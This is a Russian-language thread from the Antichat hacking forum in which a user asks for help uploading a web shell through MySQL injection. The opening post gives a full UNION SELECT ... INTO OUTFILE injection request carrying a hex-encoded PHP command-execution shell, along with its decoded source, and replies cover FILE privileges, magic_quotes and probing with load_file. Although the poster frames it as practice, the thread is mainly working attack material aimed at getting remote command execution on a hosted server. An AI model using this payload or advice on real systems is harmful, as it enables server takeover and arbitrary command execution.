Форум АНТИЧАТ - Помогите с заливкой шелла через mysql

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите с заливкой шелла через mysql (https://forum.antichat.xyz/showthread.php?t=66721)

Помогите с заливкой шелла через mysql

Хотел потренироваться в заливке шелла.
Написал бажный скрипт, сформировал запрос

Цитата:

test.php?id=2'+union+select+'/*','*/',0x3C3F706870206966202869737365742028245F4745545B 27636D64275D292920206563686F2073797374656D2028245F 4745545B27636D64275D293B203F3E,'/*',5,6,7,'*/'+INTO+OUTFILE+%22/home/test/public_html/shell.php%22/*

где 0x3C3F... это

Цитата:

<?php if (isset ($_GET['cmd'])) echo system ($_GET['cmd']); ?>

На localhost все прекрасно работает.
Заливаю на полноценный платный хостинг потестить,естественно меняю путь ... но результата нет.
Возможно это из-за отсутствия прав FILE ?
Есть ли другие способы заливки шелла,основанные на использовании MySQL Injection ?

P.S.Если разместил не в том разделе, пожалуйста перенесите.

magic_quotes=on
И на хостингах file_priv у рутов только. Таким способом не зальешь

Нет magic_quotes выключенны.
Подскажите,что не так.
Есть ли еще способы заливки шелла через mysql ?

проверь файл прив если есть доступ к mysql.user

Цитата:

Сообщение от blackybr

проверь файл прив если есть доступ к mysql.user

К сожалению не могу проверить.

Цитата:

ERROR 1044 (42000): Access denied for user '*****'@'***.**.**.**' to database 'mysql'

Подозреваю, что файл прива нет :-(
Заливка шелла в mysql основана только на select into outfile ? Либо есть еще варианты ?

Эмм... а почему в information_schema.tables не залить ? (гавно вопрос,но ладно) )))

Велемир, что ты собрался заливать в таблицу?

хз )))))))))))))))))))))))))))ыыыыыы )))

есть несколько способов, но на все нужны fil_priv. Проверить иожно легче запросом c load_file